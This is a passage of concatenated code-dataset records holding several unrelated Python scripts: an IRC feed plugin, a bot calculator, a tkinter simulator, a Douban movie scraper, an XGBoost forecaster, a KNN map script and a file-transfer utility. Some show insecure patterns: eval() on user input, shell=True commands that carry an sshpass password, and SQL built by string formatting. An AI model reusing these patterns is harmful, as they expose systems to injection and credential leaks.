\"\":\n say(HELP_MESSAGE)\n return\n self.feeds.append(Feedpoller(say, url, time, title))\n self.saver.save(server, channel, message)\n elif message.startswith(\"!removefeed\"):\n feeds = []\n for i in message.split(\" \"):\n i = int(i) if unicode(i).isdecimal() else -1\n if i >= 0 and i < len(self.feeds):\n feeds.append(i);\n for i in sorted(feeds, reverse=True):\n say(REMOVING_FEED_MESSAGE.format(i, self.feeds[i].feed.title))\n del self.feeds[i]\n self.saver.remove(i)\n log.msg(\"Removed feed: \" + str(i))\n elif message.startswith(\"!listfeed\"):\n if len(self.feeds) == 0:\n say(NO_FEED_MESSAGE)\n for i, feed in enumerate(self.feeds):\n say(LIST_FEED_ITEM_MESSAGE.format(i, feed.feed.title))\n\n def update(self):\n for feed in self.feeds:\n feed.update()\n\nif __name__ == \"__main__\":\n sys.exit(Feedretriever.run())\n","sub_path":"plugins/feedretriever/feedretriever.py","file_name":"feedretriever.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"15825505","text":"from core.decorators import instance, command\nfrom core.command_param_types import Any\nimport re\n\n\n@instance()\nclass CalculatorController:\n def __init__(self):\n self.allow_chars_regex = re.compile(\"^[0123456789.,+\\-*%()/ &|^~<>]+$\")\n\n @command(command=\"calc\", params=[Any(\"formula\")], access_level=\"all\",\n description=\"Perform a calculation\")\n def calc_cmd(self, channel, sender, reply, args):\n forumla = args[0]\n if self.allow_chars_regex.match(forumla):\n try:\n reply(\"%s = %s\" % (forumla, round(eval(forumla), 4)))\n except SyntaxError:\n reply(\"Invalid formula supplied.\")\n else:\n reply(\"Invalid character detected.\")\n","sub_path":"modules/standard/helpbot/calculator_controller.py","file_name":"calculator_controller.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"185198006","text":"import tkinter as tk\nfrom tkinter import *\n\nlaunch_angle = None\nlaunch_speed = None\n\nheightm = 1\nlaunch_height = 500 - heightm * 50\n\ndistance = None\nmax_height = None\nflight_time = None\n\n\ndef runsim():\n print('its working')\n\n\nclass canvas:\n def __init__(self, master=None):\n self.master = master\n\n self.x = 0\n self.y = 0\n\n self.canvas = Canvas(self.master, bg=\"blue\", width=960, height=500)\n self.canvas.pack()\n\n self.ball = self.canvas.create_oval(10, launch_height - 70, 80, launch_height, outline='black', fill='yellow',\n width=2)\n\n self.movement()\n\n run_sim = tk.Button(self.master, text=\"Run Simulation\", padx=5, pady=10, fg=\"white\", bg=\"green\", command=runsim)\n run_sim.pack()\n\n def movement(self):\n self.canvas.move(self.ball, self.x, self.y)\n\n self.canvas.after(100, self.movement)\n\n def launch(self, angle, speed, height):\n height = launch_height\n angle = launch_angle\n speed = launch_speed\n\n\n# enable tkinter modules that create a new window with its name and dimensions and initiates the main loop\nif __name__ == '__main__':\n window = Tk()\n canvas = canvas(window)\n\n window.title(\"Launch Simulator\")\n window.geometry('960x540')\n window.mainloop()\n","sub_path":"Sim.py","file_name":"Sim.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"413903324","text":"import os, sys, re, time\nimport json\nimport requests\nimport hashlib\nimport pandas\nimport random\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\nfrom PIL import Image\nfrom threading import Thread\nimport inspect\nimport ctypes\nimport win32gui\nimport win32con\nimport datetime, time\nfrom selenium import webdriver\nfrom PostgreSQL import PostgreSQL\nfrom function import *\nfrom setting import *\n\nsearch = '/v2/movie/search?q='\n\nUSER_AGENTS = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',\n 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',\n 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)',\n 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',\n 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',\n 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',\n 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',\n]\n\nclass DouBan(object):\n \"\"\"docstring for DouBan\"\"\"\n name = 'DouBan'\n domain = 'https://api.douban.com'\n\n def __init__(self):\n super(DouBan, self).__init__()\n headers = {\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Encoding':'gzip, deflate, br',\n 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Connection':'keep-alive',\n 'Upgrade-Insecure-Requests':'1',\n }\n self.s = requests.session()\n self.s.headers.update(headers)\n self.path = path\n self.pg = PostgreSQL(db)\n # self.action()\n\n def __getResponse(self, url, data={}, method=''):\n self.s.headers['User-Agent'] = random.choice(USER_AGENTS)\n if method == 'post':\n if len(data) == 0: return\n try: resp = self.s.post(url, data=data)\n except Exception as e: pass\n else: return resp\n else:\n try: resp = self.s.get(url, data=data) if len(data) > 0 else self.s.get(url)\n except Exception as e: pass\n else: return resp\n\n def webSearch(self, mid, title, year, imdb):\n url = 'https://movie.douban.com/subject_search?search_text=%s&cat=1002' % parse.quote(title)\n browser = webdriver.Firefox()\n browser.get(url)\n html = BeautifulSoup(browser.page_source, 'html.parser')\n divs = html.find_all('div',{'class':'item-root'})\n divs = [i.find('a',{'class':'cover-link'}) for i in divs if i.find('a',{'class':'cover-link'}) is not None]\n divs = [{'href':i.get('href'),'title':i.find('img').get('alt'),'src':i.find('img').get('src')} for i in divs]\n reg = r\"([0-9]{4})\"\n num = 1\n string = ''\n for i in divs:\n string += ' %d-%s' % (num,i['title'])\n num += 1\n res = re.findall(reg, i['title'])\n if len(res) > 0 and res[0] == str(year):\n browser.quit()\n return i['href'].split('/')[-2]\n else:\n url = None\n if ':' in title:\n for key in title.split(':'):\n url = self.webSearch(mid, key, year, imdb)\n if url is not None: break\n if url is None:\n panel = win32gui.FindWindow(None, '管理员: 命令提示符 - DouBan')\n if string != '':\n img = self.pg.select('res_img',['filename'],[\"mid = '%s'\" % mid])\n thread = Thread(target=self.openPic, name=\"Open.__process\", args=(img[0][0],))\n thread.setDaemon(True)\n thread.start()\n time.sleep(1)\n win32gui.SetForegroundWindow(panel)\n while True:\n print()\n print('名称:',title)\n print('年代:',year)\n print('imdb:',imdb)\n print(string)\n print()\n number = input(\"请输入确定的序号: \") if string != '' else '0'\n if number.isdigit() and int(number) <= len(divs): break\n if string != '':\n imgHwnd = win32gui.FindWindow('RCImageViewerFrame', None)\n win32gui.PostMessage(imgHwnd, win32con.WM_CLOSE, 0, 0)\n browser.quit()\n if int(number) > 0: return divs[int(number)-1]['href'].split('/')[-2]\n else:\n browser.quit()\n return url\n\n def openPic(self,file):\n img = Image.open(path+'Picture/'+file)\n img.show()\n\n def apiSearch(self, keyword, year=None):\n res = self.__getResponse('%s%s%s' % (self.domain, search, keyword))\n try: res = json.loads(res)\n except Exception as e: pass\n else:\n if res.get('subjects') is None: return\n for i in res.get('subjects'):\n if year is not None and i.get('year') == str(year): return i['id']\n else:\n if ':' in keyword:\n for key in keyword.split(':'):\n con = self.apiSearch(key.strip(), year)\n if con is not None: return con\n\n def getContent(self, id, imdb=None, type='record'):\n url = 'https://movie.douban.com/subject/%s/' % id\n html = self.__getResponse(url)\n if html is None: return\n html = BeautifulSoup(html.text, 'html.parser')\n\n ims = html.findAll('a',{'rel':'nofollow','target':'_blank'})\n im = None\n for i in ims:\n if 'imdb' in i.get('href'): im = i.get('href')\n if im is not None and im != imdb and type == 'record': return\n\n data = {'url':url}\n\n imdb_html = self.__getResponse(im)\n if imdb_html is None: return\n imdb_html = BeautifulSoup(imdb_html.text,'html.parser')\n imdb_html = imdb_html.find('span',{'itemprop':'ratingValue'})\n if imdb_html is not None: data['imdb_score'] = imdb_html.getText()\n\n info = html.find('span', {'property': 'v:itemreviewed'})\n data['title'] = info.text if info is not None else ''\n\n info = html.find('a', {'rel': 'v:directedBy'})\n data['directors'] = modifyName(info.text if info is not None else '')\n\n info = html.find_all('a', {'rel': 'v:starring'})\n if info is not None: data['actors'] = modifyName(','.join([i.text for i in info]))\n\n info = html.find_all('span', {'property': 'v:genre'})\n if info is not None: data['types'] = ','.join([i.text for i in info])\n\n info = html.find_all('span', {'property': 'v:initialReleaseDate'})\n if info is not None: data['playdate'] = ','.join([i.text for i in info])\n\n info = html.find('span', {'property': 'v:runtime'})\n data['duration'] = info.text if info is not None else ''\n\n data['description'] = ''\n data['thestory'] = ''\n info = html.find('span',{'class':'all hidden'})\n if info is None: info = html.find('span', {'property': 'v:summary'})\n if info is not None:\n info = info.text.split('\\n')\n info = [i.lstrip().rstrip() for i in info]\n while '' in info: info.remove('')\n data['description'] = ''.join(info)[:200]\n for i in info: data['thestory'] += '%s' % i\n\n info = html.find('div', id='info')\n if info is not None:\n info = info.contents\n for i in range(0, len(info)):\n\n if len(str(info[i])) < 10: continue\n if str(info[i]).find('语言:') != -1: data['language'] = ','.join(modifyLanguage(info[i+1].replace(' / ', ',')))\n if str(info[i]).find('制片国家') != -1: data['district'] = ','.join(modifyDistrict(info[i+1].replace(' / ', ',')))\n if str(info[i]).find('又名:') != -1: data['alias'] = info[i + 1].replace(' / ', ',')\n if str(info[i]).find('编剧:') != -1:\n bj = info[i].findAll('a')\n b = [j.getText() for j in bj]\n data['scriptwriters'] = modifyName(','.join(b))\n\n info = html.find('div', {'class': 'tags-body'})\n if info is not None: data['label'] = ','.join([i.getText() for i in info.findAll('a')])\n info = html.find('strong', {'class': 'll rating_num'})\n if info is not None: data['douban_score'] = info.getText()\n # print(data)\n return data\n \n def __getPoster(self,id,mid):\n url = 'https://movie.douban.com/subject/%s/photos?type=R' % id\n html = self.__getResponse(url)\n if html is None: return False\n if '异常请求' in html.text: return False\n if 'window.location.href' in html.text and 'sec.douban.com' in html.text: return False\n if 'Your IP is restricted' in html.text: return False\n \n # if html is None: return\n html = BeautifulSoup(html.text,'html.parser')\n divs = html.find_all('div',{'class':'cover'})\n divs = [i.find('a').get('href') for i in divs]\n\n if len(divs) < 1:\n print('片子:%s 没有海报' % mid)\n data = dict(\n mid = mid,\n type = 'poster',\n site = self.name\n )\n self.pg.insert('res_defect', data)\n for i in divs:\n self.s.headers['Referer'] = i\n picid = i.split('/')[-2]\n picurl = 'https://img3.doubanio.com/view/photo/raw/public/p%s.jpg' % picid\n where = [\"resource LIKE '%\"+picid+\"%'\"]\n where.append(\"type = 'poster'\")\n where.append(\"site = '%s'\" % self.name)\n where.append(\"mid = '%s'\" % mid)\n rec = self.pg.select('res_img',where=where)\n if len(rec) > 0: continue\n # # rec = self.pg.select('res_img',where=[\"resource = '%s'\" % src])\n # # if len(rec) > 0: continue\n file = self.__downloads(picurl)\n data = dict(\n mid = mid,\n filename = '%s/%s.jpg' % (self.name, file),\n resource = i,\n type = 'poster',\n site = self.name,\n classes = 'resource'\n )\n self.pg.insert('res_img',data)\n \n def __downloads(self, url, type='img'):\n path = '%s/Picture/%s' % (self.path,self.name) if type == 'img' else '%s/Torrent/%s' % (self.path,self.name)\n if not os.path.exists(path): os.makedirs(path)\n file = hashlib.md5(url.encode('utf8')).hexdigest()\n path = '%s/%s.jpg' % (path,file) if type == 'img' else '%s/%s.torrent' % (path,file)\n data = self.__getResponse(url)\n with open(path, 'wb') as f: f.write(data.content)\n return file\n\n def getPoster(self):\n defect = self.pg.select('res_defect',['mid'],[\"site = '%s'\" % self.name,\"type = 'poster'\"])\n # defect = [str(i[0]) for i in defect]\n maxid = self.pg.custom(\"SELECT mid FROM res_img WHERE site = 'DouBan' and type = 'poster' ORDER BY mid DESC LIMIT 1 OFFSET 0\")\n pid = self.pg.custom(\"SELECT mid FROM res_img WHERE site = 'DouBan' and type = 'poster' GROUP BY mid\")\n pid = [str(i[0]) for i in pid+defect if i[0] != maxid[0][0]]\n ids = self.pg.select('res_info', ['id','mid','url'], ['\"mid\" NOT IN (%s)' % ','.join(pid)], order=['mid ASC'])\n for i in ids:\n doubanid = i[2].split('/')[-2]\n print('信息ID:%s 资源ID:%s ' % (i[0],i[1]))\n # break\n if self.__getPoster(doubanid,i[1]) is False: break\n \n\n\n def action(self):\n ids = self.pg.select('res_info', ['mid'])\n ids = [str(i[0]) for i in ids]\n res = self.pg.select('res_site',['id','title','year','imdb'],['\"id\" NOT IN (%s)' % ','.join(ids)],['id DESC'])\n today = datetime.date.today()\n for i in res:\n # id = self.apiSearch(i[1],i[2])\n id = self.webSearch(i[0],i[1],i[2],i[3])\n if id is None: continue\n self.__getPoster(id,i[0])\n content = self.getContent(id,i[3])\n if content is not None:\n content['mid'] = i[0]\n content['site'] = self.name\n content['record'] = today\n content['update'] = today\n self.pg.insert('res_info',content)\n print(i[0],i[1],'数据下载完成')\n\n def update(self):\n today = datetime.date.today()\n where = [\"update = '%s'\" % '2018-05-25']\n # where = [\"id = 1012\"]\n column = self.pg.getColumns('res_info')\n data = self.pg.select('res_info', column, where)\n data = pandas.DataFrame(list(data), columns=column)\n \n for key, val in data.iterrows():\n print(val.id)\n content = self.getContent(val.url.split('/')[-2],type='update')\n content['update'] = '2018-05-22'\n self.pg.update('res_info', ['id = %s' % val.id], content)\n # print(content[])\n # break\n\n\nif __name__ == '__main__':\n db = DouBan()\n db.action()\n # db.getPoster()\n # db.getPoster('3450654','157')\n # print(db.search('Paws P.I.','2018'))\n # res = db.webSearch(13664,'Paws P.I.','2018','http://www.imdb.com/title/tt8064262')\n # print(res)\n # db.getContent('ddd','ddd')\n # content = db.search('Messengers 2: The Scarecrow',2009)\n # content = db.search('xxxxxxxxxxxxxxxxxxxxx:xxx',2017)\n # print(content)\n # for k,v in content.items():\n # print(k, ' : ', v)\n # print()\n","sub_path":"DouBan.py","file_name":"DouBan.py","file_ext":"py","file_size_in_byte":15511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"461261339","text":"from sklearn.model_selection import train_test_split\nimport pandas as pd\nimport xgboost as xgb\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"../data/preprocessed/precrocessed2.csv\")\nres = pd.read_csv(\"../data/yancheng_testA_20171225.csv\")\nres_df = res.copy()\nres_df = pd.merge(res_df[['predict_date','class_id']],df,how='left',on=['class_id'])\nres_df = res_df.drop('sale_date',axis=1)\nres_df.rename(columns={'predict_date':'sale_date'},inplace = True)\n\n\n#print(df.sale_quantity.skew())\n\ndf_y = df['sale_quantity']\ndf_x = df.drop('sale_quantity',axis=1)\n\n#train_x,test_x,train_y,test_y = train_test_split(df_x,df_y,test_size=0.3)\n\nxgb_params = {\n 'eta' : 0.05,\n 'booster': 'gbtree',\n 'max_depth' : 8,\n 'subsample' : 0.7,\n 'colsample_bytree' : 0.7,\n 'objective' : 'reg:linear',\n 'eval_metric' : \"rmse\",\n 'silent' : 0,\n}\n\ntrain_y_log = np.log(df_y)\n#test_y_log = np.log(test_y)\n\ndtrain_log = xgb.DMatrix(df_x,train_y_log)\n#dvalid_log = xgb.DMatrix(test_x,test_y_log)\n#watchlist = [(dtrain_log,'train'),(dvalid_log,'eval')]\n\n#print(train_y_log.skew())\n\n#cv_output_log = xgb.cv(xgb_params,dtrain_log,num_boost_round=10000,early_stopping_rounds=5000,verbose_eval=50,show_stdv=False)\n#num_boost_rounds = len(cv_output_log)\n\n\nmodel = xgb.train(xgb_params,dtrain_log,num_boost_round=100000)\n\npredict = res_df.drop('sale_quantity',axis=1)\ndpredict = xgb.DMatrix(predict)\npred_quantity_log = model.predict(dpredict)\npred_quantity = np.exp(pred_quantity_log)\nsub_ = pd.DataFrame({u'sale_quantity':pred_quantity})\nres_df['sale_quantity'] = sub_['sale_quantity']\n\nresult = res_df.groupby(['class_id']).sale_quantity.sum().round()\npredict = result.reset_index()\nresult = pd.merge(res[['predict_date','class_id']],predict,how='left',on=['class_id'])\nresult = result.fillna(0)\nresult.columns = ['predict_date','class_id','predict_quantity']\nresult.to_csv(\"../result/xgb0125_without_watchlist.csv\",index=False,header=True)\n\n\n#fig,ax = plt.subplot(1,1,figsize=(8,13))\n#xgb.plot_importance(model,max_num_features=50,height=0.5,ax=ax)\n#plt.show()","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
np.zeros((imGIS.shape[0],imGIS.shape[1]))\nfor i in range(imGIS.shape[0]):\n for j in range(imGIS.shape[1]):\n if imGIS[i,j] == 0:\n if test_bg:\n iG[i,j] = (clf.predict(im[i,j].reshape(-1,len(im[i,j]))))\n else:\n iG[i,j]=0\n else:\n iG[i,j] = (clf.predict(im[i,j].reshape(-1,len(im[i,j]))))\nif test_bg:\n iG[0,0] = 0\nde_map = iG[::-1]\nfig, _ = plt.subplots()\nheight, width = de_map.shape\nfig.set_size_inches(width/100.0, height/100.0)\nplt.gca().xaxis.set_major_locator(plt.NullLocator())\nplt.gca().yaxis.set_major_locator(plt.NullLocator())\nplt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)\nplt.axis('off')\nplt.axis('equal')\nplt.pcolor(de_map, cmap='jet')\nplt.savefig(os.path.join('result', 'decode_map.png'),format='png',dpi=600)#bbox_inches='tight',pad_inches=0)\nplt.close()\nprint('decode map get finished')\n","sub_path":"KNN/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"21109856","text":"import os\nimport sys\nimport collections\nimport json\nimport shutil\nimport subprocess\nimport glob\n\nfrom bs4 import BeautifulSoup as bs4\nimport requests\n\nfile = sys.argv[0]\n\npathname = os.path.dirname(file)\n#print(pathname)\n#print('running from %s' % os.path.abspath(pathname))\n#print(file)\n\nrunning_from_path = os.path.abspath(pathname) + '/'\n#print(running_from_path)\n\n\ndef copy_to_remote(copied_file, remote_username, remote_pass, remote_hostname, remote_port, escaped_remote):\n #remote_username = 'u0_a97'\n #remote_hostname = '192.168.1.36'\n #escaped_remote = '/storage/1527-15E5/Android/data/com.termux/files/youtube/ashin-zaw-ti-ka-nyaungdone/'\n copied_file = running_from_path + copied_file\n \n print(glob.glob(copied_file))\n \n if os.path.isfile(copied_file):\n cmd = \"sshpass -p %s /usr/bin/rsync -P --partial -avzzz %s -e 'ssh -p %s' %s@%s:'%s'\" % (remote_pass, copied_file, remote_port, remote_username, remote_hostname, escaped_remote)\n\n result = 1 \n while result != 0:\n result = subprocess.Popen(cmd,shell=True).wait()\n #text = result.communicate()[0]\n #returncode = result.returncode\n \n print(result)\n\n if os.path.isfile(copied_file):\n print('Moving file...', copied_file)\n shutil.move(copied_file, '%sfinished/' % (running_from_path)) \n\n\ndef get_line_from_file(file_in):\n file_in = running_from_path + file_in\n for f in open(file_in, 'r'):\n yield f.split('|')[1]\n\n\ndef check_link(url):\n r = requests.get(url)\n return r.status_code\n \n\n\ndef splited_lines_generator(lines, n):\n for i in range(0, len(lines), n):\n yield lines[i: i + n]\n\ndef get_splited_lines(file_in, line_num):\n \n file_in = running_from_path + file_in\n files = [f.strip('\\n') for f in open(file_in, 'r') if len(f) > 2]\n \n \n for index, lines in enumerate(splited_lines_generator(files, line_num)):\n with open('{}{}.txt'.format(running_from_path, str(index)), 'w') as f:\n f.write('\\n'.join(lines))\n \n\ndef change(num):\n mm = ['၀','၁','၂','၃', '၄', '၅', '၆','၇','၈','၉']\n strmm = ''\n mmlist = list(map(int, str(num)))\n \n for i in mmlist:\n strmm += mm[i]\n\n return strmm\n \ndef get_json(file_in_1, file_in_2, file_out, playlist, description_title, source=''):\n\n file_in_1 = running_from_path+file_in_1\n file_in_2 = running_from_path+file_in_2\n \n file_out = running_from_path+file_out\n \n titles = [title.strip('\\n') for title in open(file_in_1)]\n #get_count = len(titles)\n #print(get_count)\n\n\n descriptions = [title.strip('\\n') for 
title in open(file_in_2)]\n #get_count_descriptions = len(descriptions)\n #print(get_count_descriptions)\n\n description_title = description_title\n source = source\n\n\n results = [] \n playlist = playlist\n\n for title, description in zip(titles, descriptions):\n \n #print(title)\n if len(title.split('|')[2]) > 100:\n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title.split('|')[2]),\n \"description\": \"{}\\n{}{}\".format(description_title, description, source), \n \"id\": \"{}\".format( title.split('|')[0].split('.')[0] )\n } \n\n #print('{}။{} greater than 100'.format(change(counter), title.split('။')[1]))\n print('{} greater than 100'.format(title.split('|')[2]))\n results.append(dict_title)\n else:\n if len(description.split('|')[1]) > 0:\n \n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title.split('|')[2]),\n \"description\": \"{}\\n{} ({}){}\".format(description_title, description.split('|')[0], description.split('|')[1], source), \n \"id\": \"{}\".format(title.split('|')[0].split('.')[0])\n } \n\n results.append(dict_title)\n else:\n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title.split('|')[2]),\n \"description\": \"{}\\n{} {}\".format(description_title, description.split('|')[0], source), \n \"id\": \"{}\".format(title.split('|')[0].split('.')[0])\n } \n\n results.append(dict_title) \n \n \n data = json.dumps(results, indent=4) \n with open(file_out, encoding='utf-8', mode='w') as f:\n json.dump(data, f) \n \n# convert result to json \ndef get_json_fb(file_in_1, file_in_2, file_out, playlist, description_title, source=''):\n\n file_in_1 = running_from_path+file_in_1\n file_in_2 = running_from_path+file_in_2\n \n file_out = running_from_path+file_out\n \n titles = [title.strip('\\n') for title in open(file_in_1)]\n #get_count = len(titles)\n #print(get_count)\n\n\n descriptions = [title.strip('\\n') for title in open(file_in_2)]\n #get_count_descriptions = len(descriptions)\n #print(get_count_descriptions)\n\n description_title = description_title\n source = source\n\n\n results = [] \n playlist = playlist\n\n for title, description in zip(titles, descriptions):\n \n #print(title)\n \n if len(\"{}\\n{} {}\".format(description_title, description.split('|')[2], source)) > 5000:\n print(len(\"{}\\n{} {}\".format(description_title, description.split('|')[2], source)))\n print(\"{}\\n{}\\n{} {}\".format(description.split('|')[0].split('.')[0],description_title, description.split('|')[2], source))\n \n if len(title) > 100:\n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title),\n \"description\": \"{}\\n{}{}\".format(description_title, description, source), \n \"id\": \"{}\".format( description.split('|')[0].split('.')[0] )\n } \n\n #print('{}။{} greater than 100'.format(change(counter), title.split('။')[1]))\n print('{} greater than 100'.format(title))\n results.append(dict_title)\n else:\n \n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title),\n \"description\": \"{}\\n{} {}\".format(description_title, description.split('|')[2], source), \n \"id\": \"{}\".format(description.split('|')[0].split('.')[0])\n } \n\n results.append(dict_title) \n \n \n data = json.dumps(results, indent=4) \n with open(file_out, encoding='utf-8', mode='w') as f:\n json.dump(data, f) \n \n \ndef convert_myanmar_number(file_in, file_out, count=1, desc=None):\n\n file_in = running_from_path+file_in\n \n file_out = running_from_path+file_out\n \n titles = [title.strip('\\n\\n\\n') for 
title in open(file_in)]\n \n \n if desc is None:\n \n with open(file_out, 'w') as f:\n counter = count \n for title in titles: \n \n if title.find('။') > 0: # found\n f.write( '{}။{}|\\n'.format(change(counter), title.split('|')[2].split('။')[1]) )\n else:\n f.write( '{}။{}|\\n'.format(change(counter), title.split('|')[2]) ) \n \n counter += 1 \n else:\n \n with open(file_out, 'w') as f:\n counter = count\n for dd in desc.items():\n \n for title in titles:\n \n number = int(title.split('|')[0].split('.')[0])\n #print(type(number))\n if dd[1][1] <= number <= dd[1][2]:\n print(dd[1][0])\n print(title.split('|')[2]) \n \n try:\n \n f.write('{}။{}|{}\\n'.format(change(counter), title.split('|')[2].split('။')[1], dd[1][0]))\n #print('{}။{}|\\n'.format(change(counter), title.split('|')[2].split('။')[1]))\n #print(title.split('|')[2])\n \n except IndexError as err:\n f.write('{}။{}|\\n'.format(change(counter), title.split('|')[2]))\n #print('{}။{}|\\n'.format(change(counter), title.split('|')[2]))\n \n \n #print('{}။{}'.format(change(counter), title))\n \n counter += 1 \n \n\ndef check_duplicate(file_in):\n\n file_in = running_from_path+file_in\n \n \n urls = [url.split('|')[1] for url in open(file_in)]\n \n for key, val in collections.Counter(urls).items():\n if val > 1:\n print(key, val)\n \ndef update_raw_titles_links(file_in, file_out, count=1):\n\n file_in = running_from_path+file_in\n #print(file_in)\n file_out = running_from_path+file_out\n \n lines = [f.strip('\\n') for f in open(file_in)]\n \n with open(file_out, 'w') as f:\n counter = count\n for line in lines:\n #print(line.split('|')[1])\n #media = line.split('|')[0]\n url = line.split('|')[1]\n ext = url.split('.')[-1]\n media = '{:03d}'.format(counter)\n title = line.split('|')[2]\n if title.find('။') > 0: # found\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title.split('။')[1]) )\n else:\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title) ) \n \n counter += 1\n \ndef update_raw_reversed_titles_links(file_in, file_out, count=1):\n\n file_in = running_from_path+file_in\n #print(file_in)\n file_out = running_from_path+file_out\n \n lines = [f.strip('\\n') for f in open(file_in)]\n \n with open(file_out, 'w') as f:\n counter = count\n for line in reversed(lines):\n #media = line.split('|')[0]\n url = line.split('|')[1]\n ext = url.split('.')[-1]\n media = '{:03d}'.format(counter)\n title = line.split('|')[2]\n if title.find('။') > 0: # found\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title.split('။')[1]) )\n else:\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title) ) \n \n counter += 1 \n \n \n\n'''\nparam -> get_url.txt\n'''\ndef get_html_mp4(file_in, file_out, count=1):\n \n file_in = running_from_path+file_in\n #print(file_in)\n file_out = running_from_path+file_out\n \n text = open(file_in, 'r').read()\n\n soup = bs4(text, 'html.parser')\n \n #files = param_folder + 'titles_links.txt'\n #files = 'titles_links.txt'\n\n count = count\n with open(file_out, 'w') as fd:\n\n for key in soup.find_all('a'):\n ext = key.get('href').split('.')[-1]\n #print(ext)\n if ext in ['mp4', 'wmv']:\n #print(ext)\n #print(key.get('href'))\n counter = '{:03d}'.format(count)\n fd.write('{}.{}|{}|{}\\n'.format(counter, ext, ''.join(key.get('href').split()), ' '.join(key.get_text().split())))\n\n count += 1\n \n'''\nparam -> get_url.txt\n'''\ndef get_html_mp3(file_in, file_out, count=1):\n\n file_in = running_from_path+file_in\n \n file_out = 
